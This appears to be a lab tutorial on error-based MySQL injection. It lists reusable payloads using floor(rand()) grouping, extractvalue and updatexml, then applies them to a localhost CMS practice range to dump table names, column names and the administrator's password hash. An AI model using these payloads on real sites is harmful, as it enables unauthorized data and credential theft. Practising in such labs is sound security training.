Article directory
Error injection
In the process of judging the injection point, it is found that the error message of the SQL statement in the database will be displayed on the page, so the error message can be used for injection.
The principle of error injection is to execute SQL statements in error messages. There are many ways to trigger an error, and the specific details are different. Here it is recommended to memorize the formula directly, and replace the 1=1 part with the formula tape.
Common method
group by
?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from
information_schema.tables group by x)a)
?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit
0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
extractvalue
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))
updatexml
?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)
case environment
PHP environment: phpstudy20261103.exe
Range: cms
Collection address: Link: https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
Extraction code: jap0
Obtain the password of the website background administrator account
The address with sql injection in the cms shooting range: http://localhost/cms/cms/show.php?id=33
Note: the length of the string concatenated by the concat() function is only 31 digits, so you need to use substr to intercept the result, and then obtain all the information by replacing the intercepted subscript
Chaku
?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
或者
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
check table
-- 查询从1到31的字符
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),1,31) from information_schema.tables where table_schema = database()),0x5e))
-- 查询从31到61的字符
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),31,61) from information_schema.tables where table_schema = database()),0x5e))
check field
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(column_name),1,31) from information_schema.COLUMNS where table_schema = database() and table_name = "cms_users"),0x5e))
Check data (password)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)
1-16 digit password
e10adc3949ba59ab
17-32 digit password
be56e057f20f883e
Splicing password: e10adc3949ba59abbe56e057f20f883e
cmd5 decryption: